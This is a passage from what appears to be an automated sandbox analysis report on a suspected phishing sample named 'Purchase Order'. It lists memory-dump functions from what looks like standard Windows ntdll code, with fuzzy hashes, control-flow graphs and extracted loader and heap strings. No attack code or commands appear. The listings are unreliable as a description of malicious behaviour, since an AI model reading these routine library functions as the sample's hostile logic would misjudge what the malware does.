                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3fae85805fef34dd8d8a326404018a289697b6360c4d9fed0029d5dcdad29137
                                              • Instruction ID: 77da7f89de3dcc25ab226c25c51e010ab0943fb0ffb4af6d42df2f2fb6ed7708
                                              • Opcode Fuzzy Hash: 3fae85805fef34dd8d8a326404018a289697b6360c4d9fed0029d5dcdad29137
                                              • Instruction Fuzzy Hash: 9B9002E1202540964540B2588404B0A45054BE020AB55C517E60A5520CC529C9999136
                                              Function 34852AD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8fa73281accd48d1bd5d8d3e01a6a6892d5b78e503a944bf7b9b88c522f9e98
                                              • Instruction ID: 3586b243d3aef763dd8683f4de8aeba105db69479169d8e81feaa7d90536e538
                                              • Opcode Fuzzy Hash: b8fa73281accd48d1bd5d8d3e01a6a6892d5b78e503a944bf7b9b88c522f9e98
                                              • Instruction Fuzzy Hash: 50900265212400070145B558070460700464BD535A355C522F6066510CD625C9A95122
                                              Function 34852AF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d418024215a39f271dcdeee75b22b300dc20b470e72c5e0192288ced12b0221
                                              • Instruction ID: 8e4183529900449fbe9fdfd6929709ee0874fd5e5b4ca02a522a219dfb96beac
                                              • Opcode Fuzzy Hash: 1d418024215a39f271dcdeee75b22b300dc20b470e72c5e0192288ced12b0221
                                              • Instruction Fuzzy Hash: 73900265222400060185B558060460B04455BD635A395C516F6467550CC625C9AD5322
                                              Function 34852B80 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4cdb86a835c5d5604c50ab862f35d4fcba7400cd457d0505832377f80969fba
                                              • Instruction ID: 6a374872ff6200012a870b79b79ae35be144cd3afe2102ac5f17e00ff0099cb3
                                              • Opcode Fuzzy Hash: a4cdb86a835c5d5604c50ab862f35d4fcba7400cd457d0505832377f80969fba
                                              • Instruction Fuzzy Hash: F190027120240806D1447158480478600054BD030AF55C512AB075615E9669C9D97132
                                              Function 34852BA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54bf0ce68af71b5e4d01c3b2b95d72aa1f6852e46fabd42f3741e8e1388be50c
                                              • Instruction ID: 149e1fc1f49264a1d867bc1d51f4ab06c35022e10b21bb170fb030302588e1ac
                                              • Opcode Fuzzy Hash: 54bf0ce68af71b5e4d01c3b2b95d72aa1f6852e46fabd42f3741e8e1388be50c
                                              • Instruction Fuzzy Hash: E490027160640806D1907158441474600054BD030AF55C512A5075614D8759CB9D76A2
                                              Function 34852BE0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7a0b3c5b86b64011a3ad37f8b77ef09236ae83dcef30c06db3095df646d7431
                                              • Instruction ID: 42f133e88d1d3a4b8dafee1a067e046e8a3dcb0bad5db2d4c47e271e2f448587
                                              • Opcode Fuzzy Hash: b7a0b3c5b86b64011a3ad37f8b77ef09236ae83dcef30c06db3095df646d7431
                                              • Instruction Fuzzy Hash: 2490027120644846D18071584404B4600154BD030EF55C512A50B5654D9629CE9DB662
                                              Function 34852BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6aff4c985c400ca83a0364a6e204ee5724de9aa5437bd5a71c8dca2e813650a9
                                              • Instruction ID: 09e82692dd2eb2351d4d8c67226e9bd5912a5589a020525f9f923b866c874907
                                              • Opcode Fuzzy Hash: 6aff4c985c400ca83a0364a6e204ee5724de9aa5437bd5a71c8dca2e813650a9
                                              • Instruction Fuzzy Hash: 9490027120240806D1C07158440474A00054BD130AF95C516A5076614DCA19CB9D77A2
                                              Function 34852C00 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                              • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                              • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                              • Instruction Fuzzy Hash:
                                              Function 34852890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1127 34852890-348528b3 1128 3488a4bc-3488a4c0 1127->1128 1129 348528b9-348528cc 1127->1129 1128->1129 1130 3488a4c6-3488a4ca 1128->1130 1131 348528dd-348528df 1129->1131 1132 348528ce-348528d7 1129->1132 1130->1129 1133 3488a4d0-3488a4d4 1130->1133 1135 348528e1-348528e5 1131->1135 1132->1131 1134 3488a57e-3488a585 1132->1134 1133->1129 1136 3488a4da-3488a4de 1133->1136 1134->1131 1137 34852988-3485298e 1135->1137 1138 348528eb-348528fa 1135->1138 1136->1129 1139 3488a4e4-3488a4eb 1136->1139 1142 34852908-3485290c 1137->1142 1140 3488a58a-3488a58d 1138->1140 1141 34852900-34852905 1138->1141 1143 3488a4ed-3488a4f4 1139->1143 1144 3488a564-3488a56c 1139->1144 1140->1142 1141->1142 1142->1135 1145 3485290e-3485291b 1142->1145 1147 3488a50b 1143->1147 1148 3488a4f6-3488a4fe 1143->1148 1144->1129 1146 3488a572-3488a576 1144->1146 1149 34852921 1145->1149 1150 3488a592-3488a599 1145->1150 1146->1129 1151 3488a57c call 34860050 1146->1151 1153 3488a510-3488a536 call 34860050 1147->1153 1148->1129 1152 3488a504-3488a509 1148->1152 1154 34852924-34852926 1149->1154 1158 3488a5a1-3488a5c9 call 34860050 1150->1158 1169 3488a55d-3488a55f 1151->1169 1152->1153 1153->1169 1155 34852993-34852995 1154->1155 1156 34852928-3485292a 1154->1156 1155->1156 1164 34852997-348529b1 call 34860050 1155->1164 1160 34852946-34852966 call 34860050 1156->1160 1161 3485292c-3485292e 1156->1161 1176 34852969-34852974 1160->1176 1161->1160 1166 34852930-34852944 call 34860050 1161->1166 1164->1176 1166->1160 1173 34852981-34852985 1169->1173 1176->1154 1178 34852976-34852979 1176->1178 1178->1158 1179 3485297f 1178->1179 1179->1173
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 897a505325989b761a5fa03c42d6afa4248fb1945446fad1051f6e85f9a6d4f9
                                              • Instruction ID: c76a9319ed14425367755e38fa8bd10afef3dde1692291d7101753c775330bb2
                                              • Opcode Fuzzy Hash: 897a505325989b761a5fa03c42d6afa4248fb1945446fad1051f6e85f9a6d4f9
                                              • Instruction Fuzzy Hash: FD51EAB5A0421ABFDB11DBD8899097EF7B8BB0824475083A9E4A5D7741DB74DE408FE0
                                              Function 348C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1180 348c2410-348c2433 1181 348c24ec-348c24ff 1180->1181 1182 348c2439-348c243d 1180->1182 1184 348c2501-348c250a 1181->1184 1185 348c2513-348c2515 1181->1185 1182->1181 1183 348c2443-348c2447 1182->1183 1183->1181 1186 348c244d-348c2451 1183->1186 1184->1185 1187 348c250c 1184->1187 1188 348c2517-348c251b 1185->1188 1186->1181 1189 348c2457-348c245b 1186->1189 1187->1185 1190 348c251d-348c252c 1188->1190 1191 348c2538-348c253e 1188->1191 1189->1181 1192 348c2461-348c2468 1189->1192 1193 348c252e-348c2536 1190->1193 1194 348c2540 1190->1194 1195 348c2543-348c2547 1191->1195 1197 348c246a-348c2471 1192->1197 1198 348c24b6-348c24be 1192->1198 1193->1195 1194->1195 1195->1188 1196 348c2549-348c2556 1195->1196 1199 348c2558-348c2562 1196->1199 1200 348c2564 1196->1200 1202 348c2484 1197->1202 1203 348c2473-348c247b 1197->1203 1198->1181 1201 348c24c0-348c24c4 1198->1201 1204 348c2567-348c2569 1199->1204 1200->1204 1201->1181 1205 348c24c6-348c24ea call 34860510 1201->1205 1207 348c2489-348c24ab call 34860510 1202->1207 1203->1181 1206 348c247d-348c2482 1203->1206 1208 348c258d-348c258f 1204->1208 1209 348c256b-348c256d 1204->1209 1217 348c24ae-348c24b1 1205->1217 1206->1207 1207->1217 1215 348c25ae-348c25d0 call 34860510 1208->1215 1216 348c2591-348c2593 1208->1216 1209->1208 1213 348c256f-348c258b call 34860510 1209->1213 1225 348c25d3-348c25df 1213->1225 1215->1225 1216->1215 1219 348c2595-348c25ab call 34860510 1216->1219 1222 348c2615-348c2619 1217->1222 1219->1215 1225->1204 1227 348c25e1-348c25e4 1225->1227 1228 348c25e6-348c2610 call 34860510 1227->1228 1229 348c2613 1227->1229 1228->1229 1229->1222
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: cc09e1c39b52784764a3b9859e8da4353a8c6b1adefe1ab57214913b4012250d
                                              • Instruction ID: d7be3c04802152a506655dcf7404cf7bdd36cb433459f76ee94e66cd81ec0d9b
                                              • Opcode Fuzzy Hash: cc09e1c39b52784764a3b9859e8da4353a8c6b1adefe1ab57214913b4012250d
                                              • Instruction Fuzzy Hash: 1251F775E00745AFEB60CF9CCC9097FF7F9AB44240B40865AE495D7691EAB4DE408B60
                                              Function 348EA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1429 348ea670-348ea6e9 call 34822410 * 2 RtlDebugPrintTimes 1435 348ea89f-348ea8c4 call 348225b0 * 2 call 34854c30 1429->1435 1436 348ea6ef-348ea6fa 1429->1436 1438 348ea6fc-348ea709 1436->1438 1439 348ea724 1436->1439 1442 348ea70f-348ea715 1438->1442 1443 348ea70b-348ea70d 1438->1443 1440 348ea728-348ea734 1439->1440 1446 348ea741-348ea743 1440->1446 1444 348ea71b-348ea722 1442->1444 1445 348ea7f3-348ea7f5 1442->1445 1443->1442 1444->1440 1449 348ea81f-348ea821 1445->1449 1450 348ea736-348ea73c 1446->1450 1451 348ea745-348ea747 1446->1451 1455 348ea827-348ea834 1449->1455 1456 348ea755-348ea77d RtlDebugPrintTimes 1449->1456 1453 348ea73e 1450->1453 1454 348ea74c-348ea750 1450->1454 1451->1449 1453->1446 1458 348ea86c-348ea86e 1454->1458 1459 348ea85a-348ea866 1455->1459 1460 348ea836-348ea843 1455->1460 1456->1435 1469 348ea783-348ea7a0 RtlDebugPrintTimes 1456->1469 1458->1449 1461 348ea87b-348ea87d 1459->1461 1463 348ea84b-348ea851 1460->1463 1464 348ea845-348ea849 1460->1464 1467 348ea87f-348ea881 1461->1467 1468 348ea870-348ea876 1461->1468 1465 348ea96b-348ea96d 1463->1465 1466 348ea857 1463->1466 1464->1463 1470 348ea883-348ea889 1465->1470 1466->1459 1467->1470 1471 348ea878 1468->1471 1472 348ea8c7-348ea8cb 1468->1472 1469->1435 1477 348ea7a6-348ea7cc RtlDebugPrintTimes 1469->1477 1474 348ea88b-348ea89d RtlDebugPrintTimes 1470->1474 1475 348ea8d0-348ea8f4 RtlDebugPrintTimes 1470->1475 1471->1461 1473 348ea99f-348ea9a1 1472->1473 1474->1435 1475->1435 1481 348ea8f6-348ea913 RtlDebugPrintTimes 1475->1481 1477->1435 1482 348ea7d2-348ea7d4 1477->1482 1481->1435 1489 348ea915-348ea944 RtlDebugPrintTimes 1481->1489 1483 348ea7d6-348ea7e3 1482->1483 1484 348ea7f7-348ea80a 1482->1484 1486 348ea7eb-348ea7f1 1483->1486 1487 348ea7e5-348ea7e9 1483->1487 1488 348ea817-348ea819 1484->1488 1486->1445 1486->1484 1487->1486 1490 348ea80c-348ea812 1488->1490 1491 348ea81b-348ea81d 1488->1491 1489->1435 1495 348ea94a-348ea94c 1489->1495 1492 348ea868-348ea86a 1490->1492 1493 348ea814 1490->1493 1491->1449 1492->1458 1493->1488 1496 348ea94e-348ea95b 1495->1496 1497 348ea972-348ea985 1495->1497 1499 348ea95d-348ea961 1496->1499 1500 348ea963-348ea969 1496->1500 1498 348ea992-348ea994 1497->1498 1501 348ea996 1498->1501 1502 348ea987-348ea98d 1498->1502 1499->1500 1500->1465 1500->1497 1501->1467 1503 348ea98f 1502->1503 1504 348ea99b-348ea99d 1502->1504 1503->1498 1504->1473
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: 2cae4c3f78a9ef079b2ecf9e378daee427ef0442c37c99c318a367363266f108
                                              • Instruction ID: 5909930deb6fef4c8d0a4170e0d7b2ce71f8148bb4ca6d735937b746b62f5f16
                                              • Opcode Fuzzy Hash: 2cae4c3f78a9ef079b2ecf9e378daee427ef0442c37c99c318a367363266f108
                                              • Instruction Fuzzy Hash: 0AA1AE75B043158FE705CE18C890A6ABBE9FF89B50F05466DE945EB310EB70EC86CB91
                                              Function 34847630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1505 34847630-34847651 1506 34847653-3484766f call 3481e660 1505->1506 1507 3484768b-34847699 call 34854c30 1505->1507 1512 34884638 1506->1512 1513 34847675-34847682 1506->1513 1517 3488463f-34884645 1512->1517 1514 34847684 1513->1514 1515 3484769a-348476a9 call 34847818 1513->1515 1514->1507 1521 34847701-3484770a 1515->1521 1522 348476ab-348476c1 call 348477cd 1515->1522 1519 348476c7-348476d0 call 34847728 1517->1519 1520 3488464b-348846b8 call 3489f290 call 34859020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1521 1533 348476d2 1519->1533 1520->1519 1537 348846be-348846c6 1520->1537 1525 348476d8-348476e1 1521->1525 1522->1517 1522->1519 1530 348476e3-348476f2 call 3484771b 1525->1530 1531 3484770c-3484770e 1525->1531 1536 348476f4-348476f6 1530->1536 1531->1536 1533->1525 1539 34847710-34847719 1536->1539 1540 348476f8-348476fa 1536->1540 1537->1519 1541 348846cc-348846d3 1537->1541 1539->1540 1540->1514 1542 348476fc 1540->1542 1541->1519 1543 348846d9-348846e4 1541->1543 1544 348847be-348847d0 call 34852c50 1542->1544 1545 348847b9 call 34854d48 1543->1545 1546 348846ea-34884723 call 3489f290 call 3485aaa0 1543->1546 1544->1514 1545->1544 1554 3488473b-3488476b call 3489f290 1546->1554 1555 34884725-34884736 call 3489f290 1546->1555 1554->1519 1560 34884771-3488477f call 3485a770 1554->1560 1555->1521 1563 34884781-34884783 1560->1563 1564 34884786-348847a3 call 3489f290 call 3488cf9e 1560->1564 1563->1564 1564->1519 1569 348847a9-348847b2 1564->1569 1569->1560 1570 348847b4 1569->1570 1570->1519
                                              Strings
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34884725
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 348846FC
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34884655
                                              • Execute=1, xrefs: 34884713
                                              • ExecuteOptions, xrefs: 348846A0
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 34884787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34884742
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 75ffa8cf13ed07273fada0b05bb795160c39b24fbf4ed79e07126606e9ddc8ad
                                              • Instruction ID: de33f258127c84119db10dde41cdd78ff9fc4a8fe0ba5ae0cda9cd48ee6821ef
                                              • Opcode Fuzzy Hash: 75ffa8cf13ed07273fada0b05bb795160c39b24fbf4ed79e07126606e9ddc8ad
                                              • Instruction Fuzzy Hash: DF51F67660021DAEFB14AAA8DC85FAA77BDEF04340F4002E9E515AB390EB719E45CF50
                                              Function 3482A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                              Download Yara Rule
                                              Strings
                                              • Actx , xrefs: 34877A0C, 34877A73
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348779FA
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 348779D0, 348779F5
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34877AE6
                                              • SsHd, xrefs: 3482A3E4
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348779D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              • Opcode ID: 353ce54ca60ebab9367a10e49691e25a1351caaf8f49df7fd02ed7ad27698426
                                              • Instruction ID: 5c76cec2ee74889a6ad86b9e3a5c703a0a076ee7f8cc1f4d819e65961f27e088
                                              • Opcode Fuzzy Hash: 353ce54ca60ebab9367a10e49691e25a1351caaf8f49df7fd02ed7ad27698426
                                              • Instruction Fuzzy Hash: 66E19F756047028FE714CE28C994B9BBBE5EF84364F504B2DE865CB291DB31E9C5CB81
                                              Function 3488FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              • Opcode ID: c1f387d71624741d071ea95a74f14fd29e394707e3cdd486cefd81b43a973fb7
                                              • Instruction ID: ea11dd7b0e4f0db786b8e65f17f58daf5fe77b4931fc90c364a5bfb329c8ced1
                                              • Opcode Fuzzy Hash: c1f387d71624741d071ea95a74f14fd29e394707e3cdd486cefd81b43a973fb7
                                              • Instruction Fuzzy Hash: 75414AB9E00209AFDB11DF99C980ADEBBB5FF48754F100259EE04BB341D771A951CBA0
                                              Function 348065B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • LdrpLoadShimEngine, xrefs: 34869ABB, 34869AFC
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34869AC5, 34869B06
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34869AF6
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34869AB4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              • Opcode ID: 65e9325ac1970fa45466d7410d42951daf18262d980758d36166800ca386f4cb
                                              • Instruction ID: 06b47a2abaa4929768dc8480efab0e4c3b797a8de2f11ad5f29d06c2d22a88c7
                                              • Opcode Fuzzy Hash: 65e9325ac1970fa45466d7410d42951daf18262d980758d36166800ca386f4cb
